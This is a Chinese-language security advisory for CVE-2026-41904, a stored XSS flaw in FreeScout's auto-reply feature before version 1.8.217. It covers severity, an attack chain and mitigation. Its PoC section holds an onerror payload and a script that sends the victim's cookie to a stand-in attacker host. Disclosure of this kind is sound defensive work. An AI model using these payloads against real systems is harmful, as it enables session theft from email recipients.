CVE-2026-41904 FreeScout自动回复存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-41904

漏洞类型

存储型XSS

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

FreeScout

漏洞概述

FreeScout在1.8.217版本之前存在存储型XSS漏洞。拥有更新自动回复权限的攻击者可注入恶意脚本至自动回复消息中。当客户联系邮箱时，恶意脚本会在自动回复邮件中未经转义渲染。由于邮件客户端缺乏CSP保护，受害者查看邮件即导致脚本执行，存在安全风险。

技术细节

该漏洞源于FreeScout在处理邮箱自动回复功能时，未对用户输入进行适当的输出编码。具有`updateAutoReply`权限的用户可以将任意HTML或JavaScript代码保存为自动回复模板。当外部用户向受影响邮箱发送邮件时，系统会自动引用该模板生成回复邮件。由于邮件内容在客户端渲染时未经过滤，攻击者注入的Payload将在受害者的邮件客户端环境中执行。利用此漏洞，攻击者可窃取受害者的Cookie、会话凭证，或进行进一步的钓鱼攻击。

攻击链分析

STEP 1

1. 权限获取

攻击者获取拥有updateAutoReply权限的FreeScout用户账号。

STEP 2

2. 载荷注入

攻击者在邮箱设置中修改自动回复内容，插入恶意JavaScript代码（XSS Payload）。

STEP 3

3. 触发机制

受害者（客户）向该受影响邮箱发送一封普通邮件。

STEP 4

4. 载荷传输

FreeScout系统自动处理邮件，生成包含未转义恶意代码的自动回复邮件发送给受害者。

STEP 5

5. 漏洞利用

受害者使用Webmail或邮件客户端查看邮件，浏览器渲染HTML并执行恶意脚本，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept: Stored XSS in Auto-reply -->
<!-- Step 1: Inject payload in FreeScout Auto-reply settings -->
<img src=x onerror=alert(document.cookie)>

<!-- Advanced payload: Exfiltrate data -->
<script>
var i = new Image();
i.src = "http://attacker-controlled-server.com/collect?c=" + encodeURIComponent(document.cookie);
document.body.appendChild(i);
</script>

影响范围

FreeScout < 1.8.217

防御指南

临时缓解措施

建议管理员立即审查并限制具有自动回复修改权限的用户账户。在未升级修复前，建议用户谨慎处理来自该系统的邮件，并在邮件客户端中尽可能禁用JavaScript渲染（如支持）。